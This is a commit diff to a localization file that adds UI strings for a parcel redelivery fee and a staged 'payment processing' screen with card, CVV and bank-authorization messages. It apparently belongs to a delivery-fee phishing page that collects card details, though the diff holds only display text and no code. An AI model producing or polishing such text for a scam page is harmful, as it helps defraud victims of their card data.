update
This commit is contained in:
File diff suppressed because one or more lines are too long
@@ -94,5 +94,6 @@ export default {
|
||||
"{time} seconds": "{time} seconds",
|
||||
"International Payment Network": "International Payment Network",
|
||||
"redelivery_fee_message": "For redelivery, a service fee of {amount} is required. Your package will be re-delivered after payment",
|
||||
"Verifying...": "Verifying..."
|
||||
"Verifying...": "Verifying...",
|
||||
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
|
||||
};
|
||||
Reference in New Issue
Block a user